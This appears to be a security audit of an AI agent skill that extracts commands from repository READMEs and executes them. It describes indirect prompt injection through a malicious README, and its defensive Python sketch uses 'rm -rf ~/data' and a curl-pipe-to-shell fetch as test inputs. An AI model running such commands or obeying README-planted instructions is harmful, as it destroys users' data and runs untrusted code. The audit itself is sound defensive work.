ai-research-reproduction

Warn

Audited by Gen Agent Trust Hub on Apr 14, 2026

Risk Level: MEDIUM (COMMAND_EXECUTION, REMOTE_CODE_EXECUTION)
Full Analysis
  • [COMMAND_EXECUTION]: The script scripts/orchestrate_repro.py calls subprocess.run in several places. It executes both internal helper scripts and, more critically, commands extracted from the documentation of the repository being analyzed.
  • [REMOTE_CODE_EXECUTION]: The orchestration logic extracts "documented commands" from a repository's README.md (processed by extract_commands.py) and executes them in maybe_run_command and maybe_run_training. This design lets content from an external, untrusted repository determine which commands run on the user's system. The skill enforces a 'minimal trustworthy target' policy, but executing README-derived commands remains a high-risk capability when the skill is pointed at a malicious repository.
  • [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection. A malicious actor could craft a README.md containing dangerous commands (e.g., system modification or data exfiltration) that the skill's heuristic scoring mechanism (command_score in scripts/orchestrate_repro.py) ranks highly and then proposes for execution. The current implementation uses shlex.split for argument parsing, which only tokenizes the command string; it does not check whether the resulting command is safe to run.
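
The gap between tokenizing a command and vetting it can be illustrated with a short Python sketch. This is not code from the audited skill: the function vet_command, the ALLOWED_EXECUTABLES set, and the metacharacter list are all hypothetical, chosen only to show one possible check that could sit between command extraction and subprocess.run.

```python
import shlex
from typing import List

# Hypothetical allowlist for illustration; the audited skill defines no such list.
ALLOWED_EXECUTABLES = {"python", "python3", "pip", "pytest"}

# Characters that a shell would interpret as chaining, piping, substitution,
# or redirection. Rejecting them is an assumption of this sketch.
SHELL_METACHARACTERS = set(";|&`$<>")


def vet_command(command: str) -> List[str]:
    """Return an argv list if the command passes the checks, else raise ValueError."""
    if any(ch in SHELL_METACHARACTERS for ch in command):
        raise ValueError(f"shell metacharacter in command: {command!r}")
    argv = shlex.split(command)  # tokenizes only; says nothing about safety
    if not argv:
        raise ValueError("empty command")
    if argv[0] not in ALLOWED_EXECUTABLES:
        raise ValueError(f"executable not on allowlist: {argv[0]!r}")
    return argv


if __name__ == "__main__":
    # shlex.split parses a destructive command without complaint.
    print(shlex.split("rm -rf ~/data"))
    for candidate in (
        "python train.py --epochs 1",
        "rm -rf ~/data",
        "curl http://example.com/x.sh | sh",
    ):
        try:
            print("accepted:", vet_command(candidate))
        except ValueError as exc:
            print("rejected:", exc)
```

An allowlist of this kind narrows what a README can trigger but does not make execution safe: an accepted command such as python train.py still runs code supplied by the untrusted repository, so isolation (for example a container or throwaway environment) and explicit user confirmation remain relevant.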
Audit Metadata
Risk Level: MEDIUM
Analyzed: Apr 14, 2026, 09:49 AM